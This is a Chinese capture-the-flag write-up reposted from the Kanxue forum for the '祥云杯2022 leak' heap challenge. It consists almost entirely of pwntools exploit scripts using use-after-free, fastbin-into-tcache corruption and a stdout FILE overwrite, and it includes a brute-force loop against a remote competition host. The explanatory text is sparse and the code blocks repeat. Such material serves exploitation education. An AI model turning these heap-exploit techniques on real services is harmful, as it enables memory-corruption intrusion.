本文为看雪论坛精华文章
看雪论坛作者ID:xi@0ji233
一
文件分析
二
思路分析
fastbin reverse into tcache
fastbin->fd=tcache[size]->fd
fastbin->bk=&tcache[size]
tcache[size]->fd=fastbin
uaf的利用
def choice(ch):
p.sendlineafter(b'Your choice: ',str(ch))
def Index(index):
p.sendlineafter(b'Index: ',str(index))
def INDEX(index):
p.sendlineafter(b'index: ',str(index))
def add(index,size):
choice(1)
Index(index)
p.sendlineafter(b'Size: ',str(size))
def edit(index,content):
choice(2)
Index(index)
p.sendafter(b'Content: ',content)
def de(index1,index2):
choice(4)
INDEX(index1)
INDEX(index2)
def free(index):
choice(3)
Index(index)
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
free(0)
edit(0,p64(0))
free(1)
edit(1,p64(0))
free(0)
edit(0,p64(0))
free(1)
free(2)
add(0,0x30)
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
free(0)
edit(0,p64(0))
free(1)
edit(1,p64(0))
free(0)
edit(0,p64(0))
add(3,0x90)
add(5,0x20)
add(8,0xd0)
add(9,0x50)
free(4)
free(5)
edit(5,'\x40')
add(0,0x30)
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
free(0)
edit(0,p64(0))
free(1)
edit(1,p64(0))
free(0)
edit(0,p64(0))
add(3,0x90)
add(5,0x20)
add(8,0xd0)
add(9,0x50)
free(4)
free(5)
edit(5,'\x40')
add(6,0x20)
add(7,0x20)
edit(7,p64(0x6161616161616161)+p64(0x41))
free(1)
free(2)
edit(7,p64(0x65656565)+p64(0x61))
free(9)
free(2)
edit(7,p64(0x65656565)+p64(0xe1))
add(0,0x30)
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
free(0)
edit(0,p64(0))
free(1)
edit(1,p64(0))
free(0)
edit(0,p64(0))
add(3,0x90)
add(5,0x20)
add(8,0xd0)
add(9,0x50)
free(4)
free(5)
edit(5,'\x40')
add(6,0x20)
add(7,0x20)
edit(7,p64(0x6161616161616161)+p64(0x41))
free(1)
free(2)
edit(7,p64(0x65656565)+p64(0x61))
free(9)
free(2)
edit(7,p64(0x65656565)+p64(0xe1))
for i in range(3):
free(8)
edit(8,p64(0))
free(2)
edit(2,p64(0))
free(8)
edit(8,p64(0))
free(2)
edit(7,p64(0x65656565)+p64(0x41)+b'\x60\xe7')
add(11,0x50)
add(10,0x50)
edit(10,p64(0xfbad1800)+p64(0)*4+p64(0x5fffffffffff)
bk=&tcache[size]
最终exp
from pwn import *
context.log_level='debug'
file='./leak'
elf=ELF(file)
libc=ELF('./libc/libc-2.27-64.so')
#p=process(file)
def pwn():
p=remote('101.201.71.136', 20783)
def choice(ch):
p.sendlineafter(b'Your choice: ',str(ch))
def Index(index):
p.sendlineafter(b'Index: ',str(index))
def INDEX(index):
p.sendlineafter(b'index: ',str(index))
def add(index,size):
choice(1)
Index(index)
p.sendlineafter(b'Size: ',str(size))
def edit(index,content):
choice(2)
Index(index)
p.sendafter(b'Content: ',content)
def de(index1,index2):
choice(4)
INDEX(index1)
INDEX(index2)
def free(index):
choice(3)
Index(index)
add(0,0x30)
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
free(0)
edit(0,p64(0))
free(1)
edit(1,p64(0))
free(0)
edit(0,p64(0))
#free(1)
#free(2)
add(3,0x90)
add(5,0x20)
add(8,0xd0)
add(9,0x50)
free(4)
free(5)
edit(5,'\x40')
add(6,0x20)
add(7,0x20)
edit(7,p64(0x6161616161616161)+p64(0x41))
free(1)
free(2)
edit(7,p64(0x65656565)+p64(0x61))
free(9)
free(2)
edit(7,p64(0x65656565)+p64(0xe1))
for i in range(3):
free(8)
edit(8,p64(0))
free(2)
edit(2,p64(0))
free(8)
edit(8,p64(0))
free(2)
edit(7,p64(0x65656565)+p64(0x41)+b'\x60\xe7')
add(11,0x50)
add(10,0x50)
edit(10,p64(0xfbad1800)+p64(0)*4+p64(0x5fffffffffff))
edit(2,'\x68\xe7')
add(12,0x30)
add(13,0x30)
#gdb.attach(p)
p.interactive()
while True:
try:
pwn()
except:
continue
break
三
比赛感想
from pwn import *
#context.log_level='debug'
file='./leak'
elf=ELF(file)
libc=ELF('./libc/libc-2.27-64.so')
p=process(file)
def choice(ch):
p.sendlineafter(b'Your choice: ',str(ch))
def Index(index):
p.sendlineafter(b'Index: ',str(index))
def INDEX(index):
p.sendlineafter(b'index: ',str(index))
def add(index,size):
choice(1)
Index(index)
p.sendlineafter(b'Size: ',str(size))
def edit(index,content):
choice(2)
Index(index)
p.sendafter(b'Content: ',content)
def de(index1,index2):
choice(4)
INDEX(index1)
INDEX(index2)
def free(index):
choice(3)
Index(index)
add(7,0x20)
add(8,0x20)
add(9,0x90)
add(0,0x90)
add(1,0x10)
free(7)
free(8)
for i in range(3):
free(0)
edit(0,p64(0)*2)
free(9)
edit(9,p64(0)*2)
free(0)
#edit(0,p64(0)*2)
free(9)
edit(0,'\x00')
#edit(0,'\x60\xe7')
add(2,0x90)
add(10,0x90)
gdb.attach(p)
add(3,0x90)
edit(3,p64(0xfbad1800))
edit(0,'\xa0\xdc')
add(4,0x90)
free(4)
edit(4,p64(0))
free(0)
edit(0,'\x80\xe7')
add(5,0x90)
add(6,0x90)
edit(3,p64(0)*2+p64(0xfbad1800)+p64(0)*2+p64(0x31)*2+p64(0x5fffffffffff))
free(6)
edit(3,p64(0)*2+p64(0xfbad1800)+p64(0)*2+p64(0x31)+b'\x00')
choice(6)
#flag=p.recvuntil('}')
#print(flag[-40:])
p.interactive()
看雪ID:xi@0ji233
https://bbs.pediy.com/user-home-919002.htm
看雪2022KCTF秋季赛官网:https://ctf.pediy.com/game-team_list-18-29.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
原文始发于微信公众号(看雪学苑):祥云杯2022-leak Writeup